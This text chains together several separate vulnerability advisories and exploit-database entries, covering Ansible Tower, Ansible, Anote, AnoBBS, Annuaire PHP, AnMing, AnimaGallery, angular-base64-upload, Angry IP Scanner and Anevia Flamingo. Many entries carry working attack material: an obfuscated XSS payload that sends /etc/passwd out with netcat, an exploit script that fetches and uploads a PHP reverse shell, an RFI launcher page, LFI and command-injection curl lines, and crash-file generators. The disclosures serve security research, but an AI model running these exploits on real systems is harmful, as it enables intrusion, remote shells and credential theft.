Ansible Tower provides the feature to create multiple organizations inside
one tower instance. Each organization can have an unlimited number of users
and administrators which are only allowed to perform actions in the context
of their own organization. Due to missing validation of the "is_superuser"
parameter during user creation, organization admins can create superadmin
accounts and therefore elevate their privileges to gain full control of
Ansible Tower.
2) Reflected Cross-Site Scripting
Several parts of the Ansible Tower API have been identified to be vulnerable
against reflected XSS attacks which can be used by an attacker to steal user
sessions.
3) Missing Websocket Authentication / Information Leakage
The Ansible Tower UI uses Websockets to notify clients about recent events.
This part of the application lacks authentication as well as authorization,
leading to internal data about e.g. scheduled events, being leaked to
unauthorized and/or unauthenticated users.
Proof of concept:
-----------------
1) Privilege Escalation (Org-Admin to Superadmin)
Using the following request, a user with administrative privileges limited to an
organization, can create a superadmin account with access to all organizations:
> POST /api/v1/organizations/3/users/ HTTP/1.1
> Host: $host
> Authorization: Token c3f03841403a17ed79753e057167a62144dae7df
> X-Auth-Token: Token c3f03841403a17ed79753e057167a62144dae7df
>
> {"first_name":"Org1admin_superuser","last_name":"Org1admin_superuser",
> "email":"Org1admin_superuser@local.local","organization":3,
> "username":"Org1admin_superuser","password":"Org1admin_superuser",
> "password_confirm":"Org1admin_superuser","is_superuser":"true","ldap_user":""}
2) Reflected Cross-Site Scripting
The following URL parameters have been identified to be vulnerable against
reflected cross-site scripting:
* URL: /api/v1/credentials/, Parameter: order_by
* URL: /api/v1/inventories/, Parameter: order_by
* URL: /api/v1/projects/, Parameter: order_by
* URL: /api/v1/schedules/, Parameter: next_run
* URL: /api/v1/users/3/permissions/, Parameter: order_by
It is likely that similar issues exist in other parts of the application.
3) Missing Websocket Authentication / Information Leakage
An attacker can setup a websocket connection without providing any credentials
as follows. By issuing a GET request to "https://tower:8080/socket.io/1/" the
server responds with the following string:
> 43167469538:60:60:websocket,xhr-multipart,htmlfilonp-polling[...]
The first integer value can further be used to establish a websocket connection:
#~% openssl s_client -verify 0 -connect tower:8080
> GET /socket.io/1/websocket/43167469538 HTTP/1.1
> Host: tower:8080
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> Sec-WebSocket-Version: 13
> Origin: https://tower
> Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
> Connection: keep-alive, Upgrade
> Pragma: no-cache
> Cache-Control: no-cache
> Upgrade: websocket
>
>
The websocket key seen above, has been taken from the examples of the wikipedia
page on WebSockets (http://de.wikipedia.org/wiki/WebSocket) as it is only used
to verify that the server received and understood the message.
The server responds as follows:
< HTTP/1.1 101 Switching Protocols
< Upgrade: websocket
< Connection: Upgrade
< Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOo=
Now that the websocket connection has been established, data that would
otherwise be presented to logged in users to display status updates for "job
related events" inside tower, can now be observed without any authentication.
Following an example of data received through the websocket connection.
> 5::/socket.io/jobs:{"args":{"status":"pending","project_id":56,
> "unified_job_id":61,"event":"status_changed","endpoint":"/socket.io/jobs"},
> "name":"status_changed"}
Even tough no critical information has been identified leaking through the
websocket, this should still be protected with proper authentication and
authorization because it might aid an attacker in conducting further attacks.
Vulnerable / tested versions:
-----------------------------
Ansible Tower version v2.0.2 has been tested which was the most recent version
at the time of discovery.
Vendor contact timeline:
------------------------
2014-10-22: Contacting vendor through security@ansible.com and asking for
cryptographic material in order to securely send advisory.
2014-10-22: Sending unencrypted advisory as requested by vendor.
2014-10-22: Vendor suggests to release a fix prior to 12.12.2014
2014-10-28: Vendor confirms reported vulnerabilities
2014-12-10: Vendor releases fixed Version 2.0.5
2015-01-13: SEC Consult releases security advisory
Solution:
---------
Upgrade to a fixed version of Ansible Tower >= 2.0.5
Workaround:
-----------
For vulnerabilities 1 to 2, no workaround can be applied.
3 can be circumvented by blocking access to TCP port 8080 on your
Ansible Tower installation.
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com
EOF Manuel Hofer / 2015
########### Computest security advisory CT-2017-0109 #############
Summary: Command execution on Ansible controller from host
Affected software: Ansible
CVE: CVE-2016-9587
Reference URL: https://www.computest.nl/advisories/
CT-2017-0109_Ansible.txt
Affected versions: < 2.1.4, < 2.2.1
Credit: Undisclosed at Computest (research@computest.nl)
Date of publication: January 9, 2017
During a summary code review of Ansible, Computest found and exploited several
issues that allow a compromised host to execute commands on the Ansible
controller and thus gain access to the other hosts controlled by that
controller.
This was not a full audit and further issues may or may not be present.
About Ansible
-------------
"Ansible is an open-source automation engine that automates cloud provisioning,
configuration management, and application deployment. Once installed on a
control node, Ansible, which is an agentless architecture, connects to a managed
node through the default OpenSSH connection type."
- wikipedia.org
Technical Background
--------------------
A big threat to a configuration management system like Ansible, Puppet, Salt
Stack and others, is compromise of the central node. In Ansible terms this is
called the Controller. If the Controller is compromised, an attacker has
unfettered access to all hosts that are controlled by the Controller. As such,
in any deployment, the central node receives extra attention in terms of
security measures and isolation, and threats to this node are taken even more
seriously.
Fortunately for team blue, in the case of Ansible the attack surface of the
Controller is pretty small. Since Ansible is agent-less and based on push, the
Controller does not expose any services to hosts.
A very interesting bit of attack surface though is in the Facts. When Ansible
runs on a host, a JSON object with Facts is returned to the Controller. The
Controller uses these facts for various housekeeping purposes. Some facts have
special meaning, like the fact "ansible_python_interpreter" and
"ansible_connection". The former defines the command to be run when Ansible is
looking for the python interpreter, and the second determines the host Ansible
is running against. If an attacker is able to control the first fact he can
execute an arbitrary command, and if he is able to control the second fact he is
able to execute on an arbitrary (Ansible-controlled) host. This can be set to
"local" to execute on the Controller itself.
Because of this scenario, Ansible filters out certain facts when reading the
facts that a host returns. However, we have found 6 ways to bypass this filter.
In the scenarios below, we will use the following variables:
PAYLOAD = "touch /tmp/foobarbaz"
# Define some ways to execute our payload.
LOOKUP = "lookup('pipe', '%s')" % PAYLOAD
INTERPRETER_FACTS = {
# Note that it echoes an empty dictionary {} (it's not a format string).
'ansible_python_interpreter': '%s; cat > /dev/null; echo {}' % PAYLOAD,
'ansible_connection': 'local',
# Become is usually enabled on the remote host, but on the Ansible
# controller it's likely password protected. Disable it to prevent
# password prompts.
'ansible_become': False,
}
Bypass #1: Adding a host
------------------------
Ansible allows modules to add hosts or update the inventory. This can be very
useful, for instance when the inventory needs to be retrieved from a IaaS
platform like as the AWS module does.
If we're lucky, we can guess the inventory_hostname, in which case the host_vars
are overwritten [2] and they will be in effect at the next task. If host_name
doesn't match inventory_hostname, it might get executed in the play for the next
hostgroup, also depending on the limits set on the commandline.
# (Note that when data["add_host"] is set,
# data["ansible_facts"] is ignored.)
data['add_host'] = {
# assume that host_name is the same as inventory_hostname
'host_name': socket.gethostname(),
'host_vars': INTERPRETER_FACTS,
}
# [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/strategy/__init__.py#L447
# [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/strategy/__init__.py#L580
Bypass #2: Conditionals
-----------------------
Ansible actions allow for conditionals. If we know the exact contents of a
"when" clause, and we register it as a fact, a special case checks whether the
"when" clause matches a variable [1]. In that case it replaces it with its
contents and evaluates [2] them.
# Known conditionals, separated by newlines
known_conditionals_str = """
ansible_os_family == 'Debian'
ansible_os_family == "Debian"
ansible_os_family == 'RedHat'
ansible_os_family == "RedHat"
ansible_distribution == "CentOS"
result|failed
item > 5
foo is defined
"""
known_conditionals = [x.strip() for x in known_conditionals_str.split('\n')]
for known_conditional in known_conditionals:
data['ansible_facts'][known_conditional] = LOOKUP
[1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/playbook/conditional.py#L118
[2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/playbook/conditional.py#L125
Bypass #3: Template injection in stat module
--------------------------------------------
The template module/action merges its results with those of the stat module.
This allows us to bypass [1][2][3] the stripping of magic variables from
ansible_facts [4], because they're at an unexpected location in the result tree.
data.update({
'stat': {
'exists': True,
'isdir': False,
'checksum': {
'rc': 0,
'ansible_facts': INTERPRETER_FACTS,
},
}
})
# [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/action/template.py#L39
# [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/action/template.py#L49
# [3] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/action/template.py#L146
# [4] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/action/__init__.py#L678
Bypass #4: Template injection by changing jinja syntax
------------------------------------------------------
Remote facts always get quoted. Set_fact unquotes them by evaluating them.
UnsafeProxy was designed to defend against unquoting by transforming jinja
syntax into jinja comments, effectively disabling injection.
Bypass the filtering of "{{" and "{%" by changing the jinja syntax [1][2]. The
{{}} is needed to make it look like a variable [3]. This works against:
- set_fact: foo="{{ansible_os_family}}"
- command: echo "{{foo}}
data['ansible_facts'].update({
'exploit_set_fact': True,
'ansible_os_family': "#jinja2:variable_start_string:'[[',variable_end_string:']]',block_start_string:'[%',block_end_string:'%]'\n{{}}\n[[ansible_host]][[lookup('pipe', '" + PAYLOAD + "')]]",
})
# [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L66
# [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L469
# [3] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L308
Bypass #5: Template injection in dict keys
------------------------------------------
Strings and lists are properly cleaned up, but dictionary keys are not [1]. This
works against:
- set_fact: foo="some prefix {{ansible_os_family}} and/or suffix"
- command: echo "{{foo}}
The prefix and/or suffix are needed in order to turn the
dict into a string, otherwise the value would remain a dict.
data['ansible_facts'].update({
'exploit_set_fact': True,
'ansible_os_family': { "{{ %s }}" % LOOKUP: ''},
})
# [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/vars/unsafe_proxy.py#L104
Bypass #6: Template injection using safe_eval
---------------------------------------------
There's a special case for evaluating strings that look like a list or dict [1].
Strings that begin with "{" or "[" are evaluated by safe_eval [2]. This allows
us to bypass the removal of jinja syntax [3]: we use the whitelisted Python to
re-create a bit of Jinja template that is interpreted.
This works against:
- set_fact: foo="{{ansible_os_family}}"
- command: echo "{{foo}}
data['ansible_facts'].update({
'exploit_set_fact': True,
'ansible_os_family': """[ '{'*2 + "%s" + '}'*2 ]""" % LOOKUP,
})
# [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L334
# [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/safe_eval.py
# [3] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/template/__init__.py#L229
Issue: Disabling verbosity
--------------------------
Verbosity can be set on the controller to get more debugging information. This
verbosity is controlled through a custom fact. A host however can overwrite this
fact and set the verbosity level to 0, hiding exploitation attempts.
data['_ansible_verbose_override'] = 0
# [1] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/callback/default.py#L99
# [2] https://github.com/ansible/ansible/blob/a236cbf3b42fa2c51b89e9395b47abe286775829/lib/ansible/plugins/callback/default.py#L208
Issue: Overwriting files
------------------------
Roles usually contain custom facts that are defined in defaults/main.yml,
intending to be overwritten by the inventory (with group and host vars). These
facts can be overwritten by the remote host, due to the variable precedence [1].
Some of these facts may be used to specify the location of a file that will be
copied to the remote host. The attacker may change it to /etc/passwd. The
opposite is also true, he may be able to overwrite files on the Controller. One
example is the usage of a password lookup with where the filename contains a
variable [2].
[1] http://docs.ansible.com/ansible/playbooks_variables.html#variable-precedence-where-should-i-put-a-variable
[2] http://docs.ansible.com/ansible/playbooks_lookups.html#the-password-lookup
Mitigation
----------
Computest is not aware of mitigations short of installing fixed versions of the
software.
Resolution
----------
Ansible has released new versions that fix the vulnerabilities described in
this advisory: version 2.1.4 for the 2.1 branch and 2.2.1 for the 2.2 branch.
Conclusion
----------
The handling of Facts in Ansible suffers from too many special cases that allow
for the bypassing of filtering. We found these issues in just hours of code
review, which can be interpreted as a sign of very poor security. However, we
don't believe this is the case.
The attack surface of the Controller is very small, as it consists mainly of the
Facts. We believe that it is very well possible to solve the filtering and
quoting of Facts in a sound way, and that when this has been done, the
opportunity for attack in this threat model is very small.
Furthermore, the Ansible security team has been understanding and professional
in their communication around this issue, which is a good sign for the handling
of future issues.
Timeline
--------
2016-12-08 First contact with Ansible security team
2016-12-09 First contact with Redhat security team (secalert@redhat.com)
2016-12-09 Submitted PoC and description to security@ansible.com
2016-12-13 Ansible confirms issue and severity
2016-12-15 Ansible informs us of intent to disclose after holidays
2017-01-05 Ansible informs us of disclosure date and fix versions
2017-01-09 Ansible issues fixed version
# Exploit Title: Anote 1.0 - Persistent Cross-Site Scripting
# Exploit Author: TaurusOmar
# Date: 04/05/2021
# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
# Risk: High (8.8)
# Vendor Homepage: https://github.com/AnotherNote/anote
# Version: 1.0
# Tested on: Linux, MacOs
# Software Description:
A simple opensource note app support markdown only, anote allows you to view and edit files markdown has a friendly interface for paste image paste html (includes retrieve image locally) export sale file with images
export PDF support tray menu quick note (evernote inspired)
cmd + v default will convert html.
# Vulnerability Description:
The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately.
The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to
the remote attacker to get remote execution on the computer.
#Proof Video
https://imgur.com/a/mFMDOuu
# Payload : exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc)
{"bookId":"ddpQIk8Fhmoyr2wK","available":true,"_id":"VDJCb2CaIHObFXlw","createdAt":{"$$date":1620076429201},"updatedAt":{"$$date":1620076529398},"title":"XSS TO RCE","content":"[<audio src=x onerror=writeln(String.fromCharCode(10,60,97,117,100,105,111,32,115,114,99,61,120,32,111,110,101,114,114,111,114,61,34,99,111,110,115,116,32,101,120,101,99,61,32,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,59,10,101,120,101,99,40,39,110,99,32,45,119,32,51,32,49,57,50,46,49,54,56,46,49,49,49,46,49,50,57,32,49,51,51,55,32,60,32,47,101,116,99,47,112,97,115,115,119,100,39,44,32,40,101,44,32,115,116,100,111,117,116,44,32,115,116,100,101,114,114,41,61,62,32,123,32,105,102,32,40,101,32,105,110,115,116,97,110,99,101,111,102,32,69,114,114,111,114,41,32,123,10,99,111,110,115,111,108,101,46,101,114,114,111,114,40,101,41,59,32,116,104,114,111,119,32,101,59,32,125,32,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,111,117,116,32,39,44,32,115,116,100,111,117,116,41,59,10,99,111,110,115,111,108,101,46,108,111,103,40,39,115,116,100,101,114,114,32,39,44,32,115,116,100,101,114,114,41,59,125,41,59,10,97,108,101,114,116,40,39,49,39,41,34,62,60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>](http://)"}
{"$$indexCreated":{"fieldName":"updatedAt","unique":false,"sparse":false}}
{"$$indexCreated":{"fieldName":"bookId","unique":false,"sparse":false}}
<!--
# Title: AnoBBS 1.0.1 Remote File Inclusion Exploit
# Author: bd0rk || Germany
# Tested on: Ubuntu-Linux
# Twitter: twitter.com/bd0rk
# Greetz: Vadim, x0r_32, rgod, zone-h.org, Michael RaumklanG
#Vendor-URL: http://www.iterapi.com/index.php?cat=78&art=788
#Download-Link: http://www.hotscripts.com/listings/jump/download/90434
#The $prog_dir-parameter in /anobbs_dev_1.0.1/progs/bbs_auth.php line 7 is vulnerable.
>>>Exploitcode for Copy&Paste<<<
-->
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>AnoBBS 1.0.1 Remote File Inclusion Exploit</title>
<script language="JavaScript">
var dir="/progs/"
var file="/bbs_auth.php?"
var parameter ="prog_dir="
var shell="Insert your shellcode here"
function command() {
if (document.rfi.target1.value==""){
alert("Exploit failed...");
return false;
}
rfi.action= document.rfi.target1.value+dir+file+parameter+shell;
rfi.submit();
}
</script>
</head>
<body bgcolor="#000000">
<center>
<p><b><font face="Verdana" size="2" color="#008000">AnoBBS 1.0.1 Remote File Inclusion Exploit</font></b></p>
<p></p>
<form method="post" target="getting" name="rfi" onSubmit="command();">
<b><font face="Arial" size="1" color="#FF0000">Target:</font><font face="Arial" size="1" color="#808080">[http://[target]/[directory]</font><font color="#00FF00" size="2" face="Arial">
</font><font color="#FF0000" size="2">&nbps;</font></b>
<input type="text" name="target1" size="20" style="background-color: #808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';"></p>
<p><input type="submit" value="Start" name="B1"><input type="reset" value="Delete" name="B2"></p>
</form>
<p><br>
<iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe>
</p>
<b><font face="Verdana" size="2" color="#008000">bd0rk</font></b></p>
</center>
</body>
</html>
source: https://www.securityfocus.com/bid/51434/info
Annuaire PHP is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/[path]/referencement/sites_inscription.php?nom=xss&url=[xss]
# Exploit Title: AnMing MP3 CD Burner 2.0 Local Dos Exploit
# Date: 25.04.2019
# Vendor Homepage:http://www.ddz1977.com/
# Software Link: https://files.downloadnow.com/s/software/10/56/16/74/anming_setup.zip?token=1556228877_063f2dc0aed064ee5d13374d8509661c&fileName=anming_setup.zip
# Exploit Author: Achilles
# Tested Version: 2.0
# Tested on: Windows 7 x64 Sp1
# Windows XP x86 Sp3
# 1.- Run python code :AnMing.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Anming.exe and Click 'Register'
# 4.- Paste the content of EVIL.txt into the Field: 'Your Name and Registration Code'
# 5.- Click 'OK'and you will see a crash.
#!/usr/bin/env python
buffer = "\x41" * 6000
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title: AnimaGallery 2.6 (theme and lang cookie parametre) Local File Include Vulnerability
# Date: 2015/06/07
# Vendor Homepage: http://dg.no.sapo.pt/
# Software Link:http://dg.no.sapo.pt/AnimaGallery2.6.zip
# Version: 2.6
# Tested on: Centos 6.5,php 5.3.2,magic_quotes_gpc=off # Category: webapps
* Description
func.php
line 21 - 22:
include('themes/'.$THEME.'/templates.php');
include('languages/'.$LANG.'.php');
$lang and $THEME parametre from import_theme_lang() function.
function import_theme_lang()
{
$THEME = DEFAULT_THEME;
if(isset($_COOKIE['theme']) AND !THEME_LOCKED)
$THEME = $_COOKIE['theme']; <-- Not Taint Checking
$LANG = DEFAULT_LANG;
if(isset($_COOKIE['lang']) AND @file_exists('languages/'.$_COOKIE['lang'].'.php') AND !LANG_LOCKED)
$LANG = $_COOKIE['lang']; <--- Not Taint Checking
return(array($THEME, $LANG));
}
* Proof of Concept
curl "http://192.168.1.101/AnimaGallery/?load=adminboard&mode=1" --cookie "lang=../../../../../../../etc/passwd%00"
curl "http://192.168.1.101/AnimaGallery/?load=adminboard&mode=1" --cookie "theme=../../../../../../../etc/passwd%00"
# Exploit Title: Angular-Base64-Upload Library 0.1.20 - Remote Code Execution (RCE)
# Date: 10 October 2024
# Discovered by : Ravindu Wickramasinghe | rvz (@rvizx9)
# Exploit Author: Ravindu Wickramasinghe | rvz (@rvizx9)
# Vendor Homepage: https://www.npmjs.com/package/angular-base64-upload
# Software Link: https://github.com/adonespitogo/angular-base64-upload
# Version: prior to v0.1.21
# Tested on: Arch Linux
# CVE : CVE-2024-42640
# Severity: Critical - 10.0 (CVSS 4.0)
# Github Link : https://github.com/rvizx/CVE-2024-42640
# Blog Post : https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html
# DISCLAIMER:
# This proof-of-concept (POC) exploit is provided strictly for educational and research purposes.
# It is designed to demonstrate potential vulnerabilities and assist in testing the security posture of software systems.
# The author expressly disclaims any responsibility for the misuse of this code for malicious purposes or illegal activities.
# Any actions taken with this code are undertaken at the sole discretion and risk of the user.
# The author does not condone, encourage, or support any unauthorized access, intrusion, or disruption of computer systems.
# Use of this POC exploit in any unauthorized or unethical manner is strictly prohibited.
# By using this code, you agree to assume all responsibility and liability for your actions.
# Furthermore, the author shall not be held liable for any damages or legal repercussions resulting from the use or misuse of this code.
# It is your responsibility to ensure compliance with all applicable laws and regulations governing your use of this software.
# Proceed with caution and use this code responsibly.
#!/bin/python3
import re
import subprocess
import requests
import sys
import os
import uuid
import base64
def banner():
print('''
\033[2mCVE-2024-42640\033[0m - Unauthenticated RCE via Anuglar-Base64-Upload Library \033[2m PoC Exploit
\033[0mRavindu Wickramasinghe\033[2m | rvz (ラヴィズ) - twitter: @rvizx9
https://github.com/rvizx/\033[0mCVE-2024-42640
''')
def enum(url):
print("\033[94m[inf]:\033[0m enumerating for dependency installtion directories... ")
target = f"{url}/bower_components/angular-base64-upload/demo/index.html"
r = requests.head(target)
if r.status_code == 200:
print("\033[94m[inf]:\033[0m target is using bower_components")
else:
print("\033[94m[inf]:\033[0m target is not using bower_components")
target = f"{url}/node_modules/angular-base64-upload/demo/index.html"
r = requests.head(target)
if r.status_code == 200:
print("\033[94m[inf]:\033[0m target is using node_modules")
else:
print("\033[94m[inf]:\033[0m target is not using node_modules")
print("\033[91m[err]:\033[0m an error occured, it was not possible to enumerate for angular-base64-upload/demo/index.html")
print("\033[93m[ins]:\033[0m please make sure you've defined the target to the endpoint prior to the depdency installation directory")
print("\033[93m[ins]:\033[0m for manual exploitation, please refer to this: https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html")
print("\033[91m[err]:\033[0m exiting..")
exit()
version = next((line for line in requests.get(target.replace("demo/index.html","CHANGELOG.md")).text.splitlines() if 'v0' in line), None)
print("\033[94m[inf]:\033[0m angular-base64-upload version: ",version)
exploit(target)
def exploit(target):
print(f"[dbg]: {target}")
target_server_url = target.replace("index.html","server.php")
print(f"[dbg]: {target_server_url}")
payload_url = "https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php"
print("\033[94m[inf]:\033[0m generating a php reverse shell to upload..")
ip = input("\033[93m[ins]:\033[0m enter listener ip / domain: ")
port = input("\033[93m[ins]:\033[0m enter listenter port: ")
print(f"\033[93m[ins]:\033[0m start a listener, execute nc -lvnp {port}")
input("\033[93m[ins]:\033[0m press enter to continue...")
print("\033[94m[inf]:\033[0m downloading php-reverse-shell from github/pentestmonkey...")
response = requests.get(payload_url)
if response.status_code == 200:
php_code = response.text.replace("127.0.0.1", ip).replace("1234", port) # replacing default values with user input
payload_name = str(uuid.uuid4())+".php" # using a uuid for payload name
with open(payload_name, "w") as file:
file.write(php_code)
else:
print("\033[91m[err]:\033[0m failed to fetch the php-reverse-shell.")
print("\033[91m[err]:\033[0m exiting..")
exit()
with open(payload_name, 'rb') as file:
file_content = file.read()
base64_payload = base64.b64encode(file_content).decode('utf-8')
headers = {
'Content-Type': 'application/json',
}
json_data = {
'base64': base64_payload,
'filename': payload_name,
}
response = requests.post(target_server_url, headers=headers, json=json_data, verify=False)
print("\033[94m[inf]:\033[0m file upload request sent! [status-code]: ",response.status_code)
updemo_endpoint = f"uploads/{payload_name}"
print(f"[dbg]: {updemo_endpoint}")
payload_url = target_server_url.replace("server.php",updemo_endpoint)
print(f"[dbg]: {payload_url}")
if response.status_code == 200:
print(f"\033[94m[inf]:\033[0m reverse-shell is uploaded to {payload_url}")
print("\033[94m[inf]:\033[0m executing the uploaded reverse-shell..")
r = requests.get(payload_url)
if r.status_code == 200:
print("\033[94m[inf]:\033[0m process complete!")
else:
print("\033[91m[err]:\033[0m something went wrong!")
print("\033[93m[ins]:\033[0m please check the listener for incoming connections.")
if __name__ == "__main__":
try:
banner()
url = sys.argv[1]
print(f"\033[94m[inf]:\033[0m target: {url}")
enum(url)
except:
print("[usg]: ./exploit.py <target-url>")
exit()
# Exploit Title: Angry IP Scanner for Linux 3.5.3 - Denial of Service (PoC)
# Discovery by: Mr Winst0n
# Discovery Date: 2018-12-22
# Vendor Homepage: https://angryip.org/
# Software Link : https://angryip.org/download/
# Tested Version: 3.5.3 (latest version)
# Tested on: Kali linux
# Vulnerability Type: Denial of Service (DoS)
# Steps to Produce the Crash:
# 1.- Run python code : python angryip.py
# 2.- Open Xangry.txt and copy content to clipboard
# 3.- Open Angry IP Scanner
# 4.- Go to "Tools" in toolbar, click on "Preferences", then in the tab "Ports",
# 5.- Paste ClipBoard on "Port selection", and click on "OK",
# 6.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 384
crash = buffer + "BBBB" + "CCCC"
f = open("Xangry.txt", "w")
f.write(crash)
f.close()
#!/usr/bin/python
# -*- coding: cp1252 -*-
# Exploit Title: Angry IP Scanner 3.5.3 Denial of Service (PoC)
# Author: Fernando Cruz
# Date: 13/12/2018
# Vendor Homepage: https://angryip.org
# Tested Version: 3.11
# Tested on Windows 10 Pro, 64-bit
# Steps to Produce the Crash:
# 1.- Run python code : python angryip.py
# 2.- Open angryip.txt and copy content to clipboard
# 3.- Open Angry IP Scanner
# 4.- Go to "Herramientas" in toolbar, click on "Preferencias", then in the tap "Mostrar",
# 5.- Paste ClipBoard on "El valor no está disponible (sin resultados):", and click on "OK",
# 6.- Crashed
buffer = "\x41" * 44455293
f = open("angryip.txt" , 'w')
f.write(buffer)
f.close()
Exploit Title: Anevia Flamingo XS 3.6.5 - Authenticated Root Remote Code Execution
Exploit Author: LiquidWorm
Vendor: Ateme
Product web page: https://www.ateme.com
Affected version: 3.6.5
Hardware revision: 1.1
SoapLive 2.4.0
SoapSystem 1.3.1
Summary: Flamingo XL, a new modular and high-density IPTV head-end
product for hospitality and corporate markets. Flamingo XL captures
live TV and radio content from satellite, cable, digital terrestrial
and analog sources before streaming it over IP networks to STBs, PCs
or other IP-connected devices. The Flamingo XL is based upon a modular
4U rack hardware platform that allows hospitality and corporate video
service providers to deliver a mix of channels from various sources
over internal IP networks.
Desc: The affected device suffers from authenticated remote code
execution vulnerability. A remote attacker can exploit this issue
and execute arbitrary system commands granting her system access
with root privileges.
Tested on: GNU/Linux 3.14.29 (x86_64)
Apache/2.2.22 (Debian)
PHP/5.6.0-0anevia2
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5778
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5778.php
13.04.2023
--
$ curl -sL "http://192.168.1.1/admin/time.php" -H "Cookie: PHPSESSID=o4pan20dtnfb239trffu06pid4" -d "ntp_hosts%5B%5D=&ntp_hosts%5B%5D=%60id%60&ntp_address=&update=Apply&request=ntp" |findstr www-data
<td>uid=33(www-data)</td>
<input type="hidden" name="ntp_hosts[]" value="uid=33(www-data)"/>
<td>gid=33(www-data)</td>
<input type="hidden" name="ntp_hosts[]" value="gid=33(www-data)"/>
<td>groups=33(www-data),6(disk),25(floppy)</td>
